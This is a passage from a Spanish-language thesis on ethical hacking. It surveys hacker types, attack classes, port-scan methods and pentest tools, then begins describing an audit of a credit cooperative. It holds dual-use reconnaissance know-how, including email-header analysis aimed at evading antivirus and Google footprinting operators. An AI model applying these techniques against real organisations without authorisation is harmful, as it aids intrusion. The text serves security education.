transmitidos por el hub al resto de las computadoras en red
(http://www.econ.uba.ar, 2008).
15
La ventaja de esta topología es que permite el control del tráfico, sin embargo
todos los equipos tiene que estar conectados al hub, esto quiere decir si el hub
deja de funcionar no existe conexión entre ningún equipo.
Figura 6. Topología en estrella
Fuente: http://www.econ.uba.ar/www/departamentos
1.1.10.3. Topología en anillo.
La topologías de tipo anillo no tienen un punto central de conexión. Estas redes
tienen un cable que conecta un nodo al otro hasta que se forme un anillo.
Cuando un nodo envía un mensaje, el mensaje es procesado por cada
computador en el anillo (Perpinan Antonio, 2010).
Esta red identifica la computadora que es el nodo de destino dentro del anillo
si no es el equipo envía el mensaje al siguiente nodo hasta que encuentre el
destino, en caso de que no encuentre el nodo este dará la vuelta completa
retornando al nodo que envió el dato.
16
Figura 7. Topología en anillo Fuente: http://www.econ.uba.ar/www/departamentos
1.1.10.4. Topología Malla.
La topología en malla nos ofrece redundancia. En esta topología todas las
computadoras están interconectadas entre sí por medio de un tramado de
cables. Esta configuración provee redundancia porque si un cable falla hay
otros que permiten mantener la comunicación. Esta topología requiere mucho
cableado por lo que se la considera muy costosa. Muchas veces la topología
MALLA se va a unir a otra topología para formar una topología híbrida
(http://www.econ.uba.ar, 2008).
Figura 8. Topología en Malla Fuente: es.wikibooks.org
17
1.1.11. Intranet.
El término intranet se utiliza generalmente para referirse a una conexión
privada de algunas LAN y WAN que pertenecen a una organización y que está
diseñada para que puedan acceder solamente los miembros y empleados de la
organización u otros que tengan autorización Internet (CNNA Exploration
V6,2014).
1.1.12. Hacker.
Es una expresión idiomática inglesa cuya traducción literal al español tiene
varios significados, siendo el más popular el atribuido a una persona contratada
para un trabajo rutinario y que por la naturaleza del mismo su trabajo es tedioso
y entregado (Paredes Carlos, 2014).
Los hackers son los sujetos que maquinaron lo que es hoy el Internet tal y
como lo conocemos, la mayoría de los hackers programan y contribuyen al
mundo de Linux y a la mayoría de ellos le gusta estudiar la seguridad de la red
e irrumpir en los sistemas (BiltzKrieg ,2012).
Luego de analizar esta definiciones de los autores podemos indicar que los
hackers son usuarios muy avanzados son capaces de superar determinadas
medidas de seguridad, y que su motivación pueden ser diferentes entre las
cuales podemos mencionar espionaje, dinero y hasta desafíos personales.
1.1.13. Tipos de Hacker.
Las ciencias informáticas abarcan muchos campos por lo tanto existen diversos
tipos de hackers que de acuerdo a su motivación y especialidad se pueden
clasificar en:
18
1.1.13.1. Phreakers.
Se lo considera una variante de hacking, el término phreak es una unión entre
pone (teléfono) y freak (fenómeno) ( http://www.alegsa.com.ar, 2012).
Estas personas se ocupan de la red telefónica. Quieren aprender todo lo que
se pueda acerca de ello, quieren controlarlo, lo cual los lleva a hacer llamadas
telefónicas gratis (BiltzKrieg ,2012).
1.1.13.2. Hackers.
Son personas que les fascina estudiar los sistemas computacionales, estos
gozan por la adquisición de conocimiento sobre el funcionamiento, y son
motivados por un desafío de introducirse en ellos y controlarlos.
1.1.13.3. Carders.
Se le llama de esta forma al hacker, que con propósitos de cracking o preaking,
realiza transacciones con tarjetas creadas o adulteradas. Se aprovecha de las
múltiples vulnerabilidades que poseen las compañías de tarjeta de crédito
(Giménez Vicente, 2011).
Estos son pocos denunciados por que las compañías telefónicas no quieren
perder credibilidad en el mercado. Las técnicas más utilizadas por ellos
troyanos e ingeniería social.
1.1.13.4. Warez.
Son los sujetos que distribuyen software de manera ilegal. Son piratas. La
mayoría de los warez son distribuidos por grupos warez que existen con el
objeto de sacar software de los BBS (Bulletin Board System) antes de que otro
grupo publique ese mismo programa primero (BiltzKrieg ,2012).
19
Partiendo de la definición del autor se deduce que estas personas causan a las
compañías que crean software, además de ponerse a disposición a quien los
quiera ya que todos estos programas son de paga esencialmente este tipo de
piratas se dedican crear los famoso keygen.
Sujetos de virus y troyanos.
Generalmente estas personas programadores, que están interesados en cómo
trabajan los virus y los caballos de Troya y como hacerlos indetectables.
1.1.13.5. Cracker.
Son aficionados a la tecnología igual que los hackers pero utilizan estos
conocimientos para robar información no tienen moral y realizan accesos
ilegales a sistemas gubernamentales en conclusión utilizan todo lo
anteriormente descrito para beneficio propio.
Como conclusión de las definiciones anteriores la diferencia entre hacker y
cracker es que el primero accede a los sistemas solo para conseguir
información o por pura curiosidad mientras el segundo para dañarlo o
corromperlo.
1.1.14. Hacking Ético.
Ethical hacking es una metodología utilizada para simular un ataque malicioso
sin causar daño” (Tori Carlos, 2008).
Cuando hablamos de hacking ético nos referimos a la acción de efectuar
pruebas de intrusión controladas sobre sistemas informáticos; es decir que el
consultor o pentester, actuará desde el punto de vista de un cracker, para tratar
de encontrar vulnerabilidades en los equipos auditados (Astudillo Karina, 2013).
20
Estos equipos explotados en sus vulnerabilidades siempre deben están
controlados y supervisados por los empleados de la empresa y el auditor de
seguridad.
1.1.15. Modos de Hacking Ético.
La infraestructura tecnológica de una organización puede ser analizada o
auditada de diversas formas.
Los modos más comunes de hacking ético son:
Ataque local.
Ataques con equipo robado.
Ataques a entradas físicas dela organización.
Ataques por medio de equipos sin autenticación.
1.1.15.1. Ataque Local.
Esla simulación de un ataque desde el interior de la red u organización, el cual,
puede ser un empleado o un hacker que ha obtenido privilegios legítimos
para acceder al sistema y equipos de la red; su implementación puede tornarse
sencillas debido al gran número de herramientas que se encuentran en la
Internet (Malagón Constantino, 2010).
1.1.15.2. Ataques con equipos Robados.
En nuestro país y en el mundo los computadores portátiles son robados por
delincuentes muchas veces hay que evaluar como los usuarios protegen esta
información ya que a través de equipos portátiles se encuentran almacenadas
contraseñas de correos, de conexiones remotas lo que es una clara
vulnerabilidad para la organización ya que una atacante puede aprovechar esta
información para acceder a la infraestructura tecnológica.
21
1.1.15.3. Ataques a entradas físicas de la organización.
Se busca acceder a la organización a través de puertas, salida seguridades, El
atacante busca acceder a la organización para verificar si existen controles de
acceso, monitoreo por cámaras, y si existe conocimiento de la seguridad.
1.1.15.4. Ataques por medio de equipos sin autenticación.
El atacante busca accesos inalámbricos, para así ver si los sistemas son
seguros y tienen controles de seguridad activos. Es utilizado para comprobar
hasta qué nivel de control puede obtener acceso
1.1.16. Fases del hacking.
Tanto el auditor como el cracker siguen un orden lógico de pasos al momento
de ejecutar un hacking, a estos pasos agrupados se los denomina fases.
Existe un consenso generalizado entre las entidades y profesionales de
seguridad informática de que dichas fases son cinco en el siguiente orden:
Reconocimiento
Escaneo
Obtener Acceso
Mantener Acceso
Borrar Huellas
La persona que es contratada para auditar una infraestructura tecnológica
realiza solo las siguientes fases o etapas:
Reconocimiento
Escaneo
Obtener Acceso
Escribir Informe
Presentar Informe
22
Figura 9. Fases del Hacking Fuente: (Astudillo Karina, 2013) Hacking Ético 101
Cuando efectuamos un hacking ético es necesario establecer el alcance del
mismo para poder elaborar un cronograma de trabajo ajustado a la realidad y,
en base a él, realizar la propuesta económica al cliente.
Y para determinar el alcance requerimos conocer como mínimo tres elementos
básicos: el tipo de hacking que vamos a efectuar, la modalidad del mismo y los
servicios adicionales que el cliente desea incluir junto con el servicio contratado
(Astudillo Karina, 2013).
1.1.17. Tipos de Hacking.
Cuando efectuamos un hacking ético es necesario establecer el alcance del
mismo para poder elaborar un cronograma de trabajo ajustado a la realidad y,
en base a él, realizar la propuesta económica al cliente. Y para determinar el
alcance requerimos conocer como mínimo tres elementos básicos: el tipo de
hacking que vamos a efectuar, la modalidad del mismo y los servicios
adicionales que el cliente desea incluir junto con el servicio contratado.
Dependiendo desde dónde se ejecutan las pruebas de intrusión, un hacking
ético puede ser externo o interno.
23
1.1.17.1. Hacking Ético Externo.
Este tipo de hacking se lo realiza desde internet sobre la red pública, esto
indica que se van a realizar ataques a los equipos de la organización que
brindan servicios hacia el internet por ejemplo servidor web, servidor de
correo, servidor de nombre, etc.
1.1.17.2. Hacking Ético Interno.
Este hacking se ejecuta desde el interior de la empresa es decir utilizando un
equipo de la red corporativa. Este tipo de pruebas según varios autores es
donde se suelen encontrar muchas debilidades de seguridad.
Modalidades del Hacking
1.1.18. Modalidades del Hacking.
Dependiendo de la información que el cliente provea al consultor, el servicio del
hacking ético se puede ejecutar en una de las tres Modalidades:
1.1.18.1. Black box hacking (Hacking de caja negra).
Las pruebas de caja negra es un método de pruebas de software que examina
la funcionalidad de una aplicación sin escudriñando sus estructuras internas o
funcionamiento. Este método de prueba se puede aplicar a prácticamente
todos los niveles de pruebas. (BCS SIGIST, 2001).
En esta prueba el cliente solo proporciona el nombre de la empresa y el
consultor obra a ciegas por lo que se considera una caja negra para él.
1.1.18.2. Gray box hacking (Hacking de caja gris).
Este tipo particular de hacking se efectúa sobre la red privada del cliente, pero
sin que se nos brinde mayor información sobre la misma; emulando un ataque
perpetrado por un usuario interno no-autorizado, ya sea un empleado de la
24
empresa o un asesor externo que tiene acceso físico a la red de la
organización (www.elixircorp.biz,2012).
En esta prueba el cliente proporciona información limitada sobre los equipos
internos a ser auditados por ejemplo la dirección ip equipo o accesos a un
equipo de la organización.
1.1.18.3. White box hacking (hacking de caja blanca).
Este es el denominado hacking de caja blanca, aunque en ocasiones también
se le llama hacking transparente. Esta modalidad se aplica a pruebas de
intrusión internas solamente y se llama de esta forma porque la empresa
cliente le da al consultor información completa de las redes y los sistemas a
auditar (Astudillo Karina, 2013).
Este tipo de ataque se lo realiza sobre la red privada del cliente pero en este
caso se proporciona un punto de red con ip valida y direcciones ip para ser
analizadas.
1.1.19. Ataques a realizarse en el Ethical Hacking.
1.1.19.1. Ataques a las redes informáticas.
Se la denomina como una invasión a la seguridad de los sistemas estos son
maniobras planificadas y muy bien desarrolladas, actualmente son muy
sofisticadas y existen muchas herramientas que explotan estas
vulnerabilidades de diseño, de configuración de red y de operación, etc.
1.1.19.2. Ataque de escaneo de puertos.
El escaneo de puertos es una técnica que se basa en la evaluación de
vulnerabilidades por parte de hackers o administradores para auditar las
máquinas y la red (Valbuena Oscar ,2011).
25
Existen muchas herramientas para el escaneo de puertos de un computador,
los cual nos facilita los puertos abiertos o cerrados del sistema operativo de
equipo que se encuentran en la red.
1.1.19.2.1. Tipos de escaneo de puertos.
Los tipos de escaneo de puertos son:
TCP Connect
Para esta técnica no se necesita ningún privilegio se puede ejecutar a través de
un software de escaneo de puertos que existen muchos en la red, Consiste en
identificar puertos que tienen servicios asociados que usan el protocolo TCP.
TCP SYN
Como el protocolo TCP es orientado a conexión y utiliza apretón de manos de
tres vías, para establecer una sesión, esta técnica se basa en el envió de una
solicitud de sincronismo SYN a la víctima y esperar a recibir como respuesta un
sincronismo y un acuse de recibo (SYN+ACK), pero sin completar la conexión,
es decir sin enviar el acuse recibo final (Astudillo Karina, 2013).
TCP FIN
Conocido como escaneo silencioso, consiste en enviar un paquete FIN al host
de destino, los estándares de TCP/IP indican que al recibir un paquete FIN en
un puerto cerrado, se responde con un paquete RST.
Si se recibe un paquete RST por respuesta, el puerto está cerrado, y en caso
de no recibir respuesta (se ignora el paquete FIN) el puerto puede encontrarse
abierto o silencioso. Este tipo de escaneo no tiene resultados fiables.
ACK Scan
Permite identificar de manera confiable, si un puerto se encuentra en estado
silencioso. Su funcionamiento se basa en el envío de paquetes ACK con
26
números de secuencia y confirmación aleatorios.
Cuando reciba el paquete, si el puerto se encuentra abierto, responderá con un
paquete RST, pues no identificará la conexión como suya; si el puerto está
cerrado responderá con un paquete RST, pero sino se obtiene respuesta
podemos identificar claramente el puerto como filtrado (puerto silencioso)
(Malagón Constantino, 2010).
1.1.19.3. Ataque de denegación de servicio (DOS).
Tiene como objetivo dejar inaccesible a un determinado recurso de un servidor.
Generalmente se llevan a cabo mediante el uso de herramientas que envían
una gran cantidad de paquetes de forma automática para desbordar los
recursos del servidor logrando de esta manera que el propio servicio quede
inoperable (Catoira Fernando, 2012).
1.1.19.4. Ataque lógico o software.
Consiste en enviar al equipo remoto una serie de datagramas mal construidos
para aprovechar algún error conocido en dicho sistema. Los tipos de ataques
lógicos son Ping de la muerte, Tear dropy Land.
1.1.19.5. Ataque de inundación (flood).
Consiste en inundar una infraestructura tecnológica con tráfico continuo y este
es capaz de consumir todos los recursos y el ancho de banda de la red.
Los tipos de ataques de inundación más comunes son TCPSYN, SmurfIP,
UDPFlood e ICMP Flood.
1.1.19.6. Ataque de fuerza bruta.
Es una técnica que proviene originalmente de la criptografía, en especial del
criptoanálisis.
27
Es una manera de resolver problemas mediante un algoritmo simple de
programación, que se encarga de generar y de ir probando las diferentes
posibilidades hasta dar con el resultado esperado o de mejor conveniencia
(Tori Carlos, 2011).
1.1.19.7. Ataque de hombre en el medio.
Es una técnica de ataque pasivo, de nominada ARP Spoofing, se lleva a cabo
en redes LAN y WLAN. Este ataque permite capturar todo el tráfico dirigido de
uno o varios hosts del área la puerta de enlace configurado y viceversa
(LoisAdrian, 2012).
La dirección Mac address de la puerta de enlace de la víctima no sea la
verdadera si no la del atacante, así cuando la víctima realice consultas hacia
internet que serán request para su Gateway antes pasaran por el atacante.
1.1.20. Herramientas de reconocimiento.
Existen muchos aplicativos que pueden ser de ayuda a la hora de realizar
reconocimientos entre los siguientes tenemos:
Foot printing con Google
Aunque existen aún muchos otros buscadores en Internet, sin duda Google es
el más utilizado gracias a su tecnología de clasificación de páginas web (Page
Rank), la cual nos permite realizar búsquedas de forma rápida y acertada
(Astudillo Karina, 2013).
Con esto es clara la gran fuente de clasificación, análisis, búsqueda, cache de
información, confidencial o no de un objetivo que posee los buscadores.
28
Operadores de Google:
+ (Símbolo más): Se utiliza para incluir palabras que por ser muy
comunes no son incluidas en la búsqueda por Google. Por ejemplo,
digamos que queremos buscar la empresa X, dado que el artículo "la" es
muy común, usualmente se excluye de la búsqueda. Si queremos que
sea incluido entonces lo escribimos así +la empresa X
(símbolo menos): Es usado para excluir resultados que incluyan el
término al que se antepone el símbolo. Por ejemplo, si estamos
buscando entidades bancarias podríamos escribir: bancos seguros –
muebles.
"" (dobles comillas): Si queremos buscar un texto de forma literal lo
enmarcamos en dobles comillas. Ejemplo: "la empresaX".
~ (Virgulilla): Al colocar este símbolo antepuesto a una palabra, se
incluye en la búsqueda sinónimos de la misma. Por ejemplo, buscar por
la ~empresa X incluirá también resultados para la organización X.
OR: Esto permite incluir resultados que cumplan con uno o ambos
criterios de búsqueda. Por ejemplo: "Gerente General" OR "Gerente de
Sistemas" empresa X
site: permite limitar las búsquedas a un sitio de Internet en particular.
Ejemplo: Gerente General site: empresaX.com
Link: Lista las páginas que contienen enlaces al sitio indicado. Por
ejemplo al buscar link:empresaX.com obtendremos páginas que
contienen enlaces hacia la empresa X.
filetype: o ext: permite hacer búsquedas por tipos de archivos. Ejemplo:
rol + pagos ext:pdf site:empresax.com
29
allintext: Obtiene páginas que contienen las palabras de búsqueda
dentro del texto o cuerpo de las mismas. Ejemplo: allintext: La empresa
X .
inurl: muestra resultados que contienen las palabras de búsqueda en la
dirección de Internet (URL). Ejemplo: inurl: empresaX
1.1.21. Otros recursos online.
Hay otras bases de datos públicas y herramientas que brindarán datos en
tiempo real en Internet, los sitios más conocidos en el pasado fueron www
.samspa de.org y www.netcraft.com, que permitían saber el sistema operativo
de los servidores, sus rangos de direcciones, teléfonos y direcciones físicas,
entre otras cosas (Tori Carlos, 2011).
Lugo de realizar un análisis de la información facilitada por los autores
anteriormente nombrados a continuación detallamos sus principales
herramientas utilizadas en reconocimientos de infraestructura tecnológicas que
a continuación se nombran:
Smart Whois: Encuentra información acerca de una dirección IP.
Country Whois: Devuelve el país de donde proviene una dirección IP.
Trace Route: Devuelve la máquina y la IP de cada salto que da un paquete
desde la máquina original hasta la de destino por Internet.
Ping: Envía un echo request a una máquina especifica en la red.
NsLookup: Resuelve un hostname a dirección IP o viceversa.
Proxy Test: Chequea si un Proxy es realmente anónimo.
30
Environmental Variables Test: Muestra varias configuraciones remotas del
browser y de nuestra máquina.
Netstat.
El programa básico que lleva a cabo la tarea de ver los puertos en servicio
tanto en Windows como en Linux se llama Netstat, aunque su poder y eficacia
lo muestra más en Linux. Desde la consola de comandos se invoca al
programa y se le aplica una serie de opciones (BiltzKrieg, 2010).
Maltego
Maltego es una herramienta que permite recabar datos sobre una organización
de forma sencilla, a través del uso de objetos gráficos y menús contextuales
que permiten aplicar transformaciones a dichos objetos, a través de las cuales
se obtiene a su vez mayor información (Astudillo Karina, 2013).
Esta herramienta es muy útil al momento de recopilar información sobre una
empresa o persona, lo interesante es que la información es detallada
gráficamente en forma de nodos lo cual genera un árbol inmenso de datos que
se pueden relacionar y visualizar de diferentes formas.
1.1.22. Escaneo Basado en Web.
NMAP
Esta herramienta nos permite realizar un rastreo de puertos, identificar equipos
en la red, determinar servicios, características de hardware y sistemas
operativos.
Características de NMAP
Descubrimiento de servidores: Identifica computadoras en una red, por
ejemplo listando aquellas que responden a los comandos ping.
Identifica puertos abiertos en una computador a objetivo.
Determina que servicios está ejecutando la misma.
Determinar qué sistema operativo y versión utiliza dicha computadora.
Obtiene características del hardware de la red de la máquina.
31
1.1.23. Smart Whois.
Esta herramienta es capaz de proporcionarnos mucha información sobre una
dirección IP o dominio.
Sam Spade.
Es una aplicación de descubrimiento su nombre se debe al famoso detective de
la novela El Halcón Maltes y al igual que este personaje nos permite realizar
una labor muy parecida a aun detective para recabar información.
Nagios.
Monitoreas los servicios de red (POP3, HTTP, SNMP, SMTP, etc.), además
es posible programar notificaciones a los administradores en caso de
problemas o alertas suscitadas.
Este un software que es muy práctico para realizar consultas prácticamente de
cualquier parámetro de interés de un sistema incluso genera alertas a los
administradores se exceden los parámetros configurados por él.
Sniffer.
Un sniffer lo que hace es olfatear .Cuando uno se conecta al Internet, estamos
aprovechando los protocolos. No nos damos cuenta de esto, porque siempre
se usa la última capa, la de aplicación (BiltzKrieg, 2010).
Snort.
Es un sniffer de paquetes y detector de intrusos basado en red ya que
monitoriza el dominio de colisión, además almacena la base de datos en mysql.
Usando Telnet.
Telnetear es un modismo que significa utilizar un cliente telnet (aplicación para
ejecutar comandos telnet) a través de una línea de comandos ya sea un
promptMS-DOS o una shell Linux o unix, para conectarse a servicios puertos
de un sistema remoto y así obtener información de éste o a través de éste.
32
Vayamos al principio. Con un cliente telnet no podremos conectarnos a un
servidor SSH (puerto 22, por defecto y mantener una sesión normal. Son
diferentes protocolos, y siempre hay que respetar el protocolo. No se puede
conectar vía cliente FTP a un puerto servidor POP3, ya que ello se ría como
querer transmitir agua por los cables de electricidad.
Por otro lado, un puerto abierto no es sinónimo de un puerto por donde se
puede entrar literalmente al servidor o algún componente operativo del sistema.
Es solamente un servicio que, en el caso de requerir autentificación que deba
colocar se allí nombre y password para iniciar una sesión en el sistema, deberá
utilizarse un cliente adecuado y su correcta sintaxis para su conexión en el
servidor y poder así, mantener una sesión normal (Tori Carlos, 2011).
1.1.24. Análisis de correo electrónico.
Figura 10. Descripción del correo electrónico
Fuente: (Tori Carlos, 2011).Hacking Ético
33
1.- Antivirus: El dato sirve para adaptar algún método para la escalada de
privilegios no detectado por ese antivirus.
2.-Servers de correo. Qmail.
3.- Día y Horario: Este dato es importante podemos determinar horarios de
trabajo o en que fecha responden los correos.
4 y 5.- Nombres de host de los SMTP.
6.- ISP: Arnet en este caso.
7.- Dirección IP: Depende de la topología de la red y del servicio de correo.
8.- Nombres de terminales (PC): Terminal y unknown, estos sirven para
ubicarlos en una red de direcciones ip dinámicas.
9.- Origen y casillas de correo: Este correo salió de un cliente adsl de Arnet,
paso por su SMTP tercerizado.
10.- Cliente de correo y sistema operativo: Microsoft Outlook express
versión 6.00.2900.2869, Windows xp SP2 muy probable.
11.- Información en el cuerpo del mensaje: Aquí podemos encontrar
información como nombre del empleado que firma y cargo, para utilizar luego al
contactar con otro o tratar de dilucidar logins.
1.1.25. Nexpose.
Esta es una herramienta que permite ejecutar diferentes tipos de escaneos
para la búsqueda de vulnerabilidades en un host o en la red nos permite
realizar varios filtros los cuales pueden ser por puertos, equipos, redes,
protocolos.
1.1.26. Open Vas.
OpenVAS fue denominado inicialmente como GNessUs, una variante del
escáner de seguridad Nessus cuando este cambió su tipo de licenciamiento.
Se propuso como un sistema para pruebas de penetración, pentester en la
empresa Portcullis ComputerV Security ,luego fue anunciado como una
solución de software libre por Tim Brown en Slashdot (www.openvas.org,2014).
34
1.1.27. GetAcct.
Este es un software desarrollado por la empresa Security Friday, posea una
interfaz agradable de fácil uso, esta herramienta enumera todos los usuarios
los grupos y este informe puede ser exportado.
1.1.28. DumpSec.
A través de la herramienta DumpSec se realizan auditoria a los sistemas
operativos Windows para mostrar las vulnerabilidades del sistema, también
puede recolectar información de usuarios y grupos y permisos aplicados.
1.1.29. Frameworks de explotación.
Debemos saber que en la actualidad, existen diversos frameworks de
explotación, como Immunity Canvas, Core Impacy y Metasploit Framework
(MSF), este último es un entorno multiplataforma de desarrollo y ejecución de
exploits, está escrito en ruby y permite configurar y lanzar exploits contra un
sistema (Jara Héctor, Pacheco Federico, 2012).
1.1.30. Ingeniería Social.
Con el término ingeniería social se define el conjunto de técnicas psicológicas y
habilidades sociales utilizadas de forma consciente y muchas veces
premeditada para la obtención de información de terceros. No existe una
limitación en cuanto al tipo de información y tampoco en la utilización posterior
de la información obtenida. Puede ser ingeniería social el obtener de un
profesor las preguntas de un examen o la clave de acceso de la caja fuerte del
Banco de España. Sin embargo, el origen del término tiene que ver con las
actividades de obtención de información de tipo técnico utilizadas por hackers
(http://hackstory.net/,2011).
35
1.1.31. Dos.
Los métodos de denegación de servicio (DoS) han adoptado los mecanismos
de la distribución para poder llevar a cabo ataques más sofisticados y eficientes
(BiltzKrieg, 2010).
El objetivo primordial impedir o negar el acceso a determinados servicios, como
los son web, correo y el acceso remoto.
1.1.32. Aircrack.
Es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK.
Aircrack-ng puede recuperar la clave WEP una vez que se han capturado
suficientes paquetes encriptados con airodump-ng. Este programa de la suite
aircrack-ng lleva a cabo varios tipos de ataques para descubrir la clave WEP
con pequeñas cantidades de paquetes capturados, combinando ataques
estadísticos con ataques de fuerza bruta. Para crackear claves WPA/WPA2-
PSK, es necesario usar un diccionario.(http://www.aircrack-ng.org, 2010).
1.1.33. Phishing
Es un término informático que denomina un modelo de abuso informático y que
se comete mediante el uso de un tipo de ingeniería social caracterizado por
intentar adquirir información confidencial de forma fraudulenta como puede ser
una contraseña o información detallada sobre tarjetas de crédito u otra
información bancaria” (Skoudis Ed, 2006).
El cyber criminal se hace pasar como una empresa o persona de confianza en
una comunicación oficial a través de los medios de comunicación de la web o
utilizando también llamadas telefónicas.
36
1.1.34. Kali Linux.
Kali Linux es una distribución de Linux avanzada para pruebas de penetración
y auditorías de seguridad. Kali es una completa re-construcción de BackTrack
Linux desde la base hacia arriba, y se adhiere completamente a los estándares
de desarrollo de Debian, (http://es.docs.kali.org ,2013).
Esta distribución de Linux consta de muchas características entre las que
podemos mencionar las siguientes:
Más de 300 herramientas gratis
Git-arbol de código abierto
Amplio Apoyo de dispositivos inalámbricos
Kernel personalizado con parches de injección.
Paquetes firmados
Multilenguaje
Personalizable
1.2. Niveles de Seguridad.
El autor del Libro Seguridad Informática de la colección épsilon indica que en
un contexto global, la seguridad se realiza:
A nivel de usuario: Los actores tienen que comprender la importancia de
su posición.
A nivel de tecnologías usadas.
A nivel de datos en sí mismos: derechos de acceso(autenticación y
control, el usuario sólo ha de tener los permisos que le han sido
concedidos).
A nivel físico: los accesos a la infraestructura, al hardware. Si se asegura
completamente un sistema el acceso a la sala de máquinas no lo está,
bastará con robar físicamente el soporte de los datos para comprometer
gravemente el sistema (Épsilon, 2010).
37
Se definen en niveles de seguridad de sistemas para disponer de una medida
fiable y comparable que llevo el departamento de defensa de estados unidos
donde se especifica lo siguiente:
Nivel D: Protección Mínima
Nivel C: Protección Discrecional
Nivel B: Protección Obligatoria
Nivel A: Protección controlada.
Cada nivel a su vez tiene unas más clases numeradas, lo que da lugar al
siguiente siete niveles, ordenadas de menor a mayor:
Nivel D1: Nivel de seguridad más elemental (el sistema no es fiable). No se
distingue entre usuarios y no se controla la información a la que se accede
Nivel C1: sistema de protección de seguridad discrecional. Los usuarios
deberán identificarse a sí mismos por medio de un nombre de usuario y de
unas contraseñas, que determinan los derechos de accesos alos programas y
la información disponible para cada usuario.
Nivel C2: además de las características descritas en el Nivel C1, permite
restringir la ejecución y el acceso a algunos archivos no solo por permisos, sino
en niveles de autorización. Incluye auditorias del sistema, que se emplean para
mantener todos los registros de todos los eventos relacionados con la
seguridad, así como las actividades practicadas por el administrador del
sistema.
Nivel B1: es el primer nivel que soporta seguridad multinivel. El principio que
se aplica es el de que un objeto que requiere obligatoriamente de un control en
su acceso no puede aceptar cambios en sus permisos, incluso aunque hayan
sido solicitadas entre objetos con diferentes niveles de seguridad.
38
Nivel B3: dominios de seguridad. Establece dominios integrales de seguridad,
de forma que la pertenencia a uno de ellos implica automáticamente la
aplicación de medidas de seguridad específicas.
Nivel A: diseño verificado. Es el nivel de seguridad más elevado, y supone que
todos los objetos y sistemas que se encuentran en este nivel han sido
protegidos para evitar violaciones de seguridad
Estos siete niveles definen con claridad que requisitos de seguridad se deben
aplicar y con que intensidad (Agé Marion, Crocfer Nicolás, 2005).
1.3. Valoración Crítica.
Existe diversos tipos de hacking pero el de utilidad para salvaguardar la
seguridad de las empresas es el hacking ético ya que permite contratar los
servicios de un profesional en el área para asegurar nuestra infraestructura
tecnológica especialmente nuestras estaciones de trabajo por cuanto es
necesario realizar un test de seguridad regularmente.
Para analizar las amenazas y vulnerabilidades de nuestra infraestructura y
poder realizar las mejoras y actualizaciones que permitan tener un nivel
aceptable dentro de los niveles de seguridad.
1.4. Conclusiones del Capítulo.
El aseguramiento de la información en las empresas públicas y privadas
tienen altos costos por implementación lo que lleva a que no auditen y
aseguren su infraestructura TI.
Se verificó la importancia de conocer las bases teóricas de las
principales amenazas y software de explotación que se encuentran
expuestas las infraestructuras de TI.
39
Se detalló las etapas que tiene u hacking y las etapas que tiene un
hacking ético además de establecer las diferencias correspondientes.
Las herramientas analizadas en este trabajo son netamente open source
por lo que no generara gastos su utilización.
Los metaexploit son importantes al querer controlar un equipo Windows
o linux en la red a través de las vulnerabilidades de los puertos.
Kali Linux es la herramienta más completa y libre que utilizan los
auditores y pentester para realizar hacking ético.
40
CAPITULO II.
2. MARCO METODOLÓGICO Y PLANTEAMIENTO DE LA PROPUESTA
Con la presente tesis de grado refleja una investigación encaminada a realizar
un trabajo de Hacking Ético a la infraestructura tecnológica y verificar el estado
de la seguridad en la intranet y servicios, para otorgar niveles de seguridad en
la cooperativa de ahorro y crédito 13 de Abril de la ciudad de ventanas.
2.1. Caracterización del Sector.
La cooperativa de ahorro y crédito 13 de Abril se encuentra Ubicada en la
Provincia de los Ríos en el cantón Ventanas, la cual provee de servicios
financieros a la provincia entre sus productos posee cuentas de ahorro, crédito
inmediato , y seguros de vida.
Misión. Ser la institución de intermediación financiera, comprometida con el
desarrollo con el desarrollo socioeconómico de sus cooperados y la
comunidad, a través de la prestación de servicios y productos financieros
competitivos y no financieros, dentro de la provincia de los Ríos y sus zonas de
influencia cercana.
Visión. La Cooperativa de Ahorro y Crédito “13 de Abril”, es un referente del
sistema de Economía popular y solidaria en la provincia de los Ríos y sus
zonas de influencia, a través de proceso, metodologías e infraestructura
adaptadas a los requerimientos de nuestros socios; personal especializado en
administración financiera y sistemas de administración eficientes.
Valores.
Responsabilidad
Democracia
Igualdad
Equidad
41
Solidaridad
Servicios.
Pago de Matrícula Vehicular
Pago de Servicios Interbancarios a través del Banco Central (SPI)
Transferencias de Sueldos
Servicios Exequiales hasta 1.200 por fallecimiento del socio
Pago de Servicio Básicos.
Tipos de Prestamos.
Microcréditos (Comerciantes, Artesanos, Agricultores, Asociaciones)
Vivienda
Consumo
Emergentes
Anticipos hasta 2 sueldos
Seguros de desgravamen
Nuestros préstamos tienen las tasas de interés más bajas del mercado.
La cooperativa de Ahorro y Crédito 13 de Abril tiene dos sucursales una en la
parroquia San Juan y otra en la ciudad de Babahoyo.
42
Orgánico Funcional.
Figura 11. Orgánico Funcional
Fuente: Cooperativa de Ahorro Crédito 13 de Abril
2.2. Descripción del Procedimiento Metodológico.
Enfoque
El enfoque de la investigación es cualitativo y cuantitativo.
Es cuantitativo ya que en esta tesis se realiza una investigación de campo para
la recopilación de la información a través de encuestas aplicadas a los
empleados, luego se realizó el análisis e interpretación de las respuestas
tomando en cuenta una muestra de la población de la cooperativa de ahorro y
crédito.
La tesis es cualitativa ya que se realizó un análisis de las diversas teorías para
dar solución a los problemas y por último se elabora una propuesta para
realizar, dar solución a los datos obtenidos.
43
2.2.1. Tipos de Investigación
Investigación Bibliográfica. Esta investigación se realizó en este trabajo de
investigación, ya que se aplica un estudio bibliográfico, el marco teórico analizó
y se fundamentó científicamente el Hacking Ético los problemas de seguridad
en las redes y las herramientas para realizarlo.
Investigación de Campo. Describe todos los hechos observados dentro de la
cooperativa de Ahorro y Crédito de la ciudad de Ventanas y de su
infraestructura tecnológica y el estado que se encuentra actualmente la
seguridad.
Investigación Aplicada. Se utilizó en esta investigación por qué se va a dar
un informe de la seguridad informática de la infraestructura tecnológica.
2.2.2. Métodos de Investigación.
Métodos, Técnicas e Instrumentos.
Metodología de desarrollo del Hacking Ético.
En el desarrollo del Hacking Ético para monitorear los niveles de seguridad en
la intranet de la cooperativa de ahorro y crédito de la ciudad de Ventanas, se
utilizó la metodología del CEH (Certified de Ethical Hacking) que consta de las
siguientes fases:
1.- Reconocimiento
2.- Escaneo
3.- Obtener Acceso
4.- Escribir Informe
5.- Presentar el Informe
44
Esta metodología permitió elaborar un informe brinda a la cooperativa de
ahorro y crédito, que las medidas adoptadas en su entorno tecnológico no son
lo suficiente eficaces para brindar seguridad a la información generada.
Métodos de Investigación.
Los métodos que se utilizaron en el desarrollo de la tesis son empíricos y
teóricos.
Métodos Empíricos.
Observación Científica.
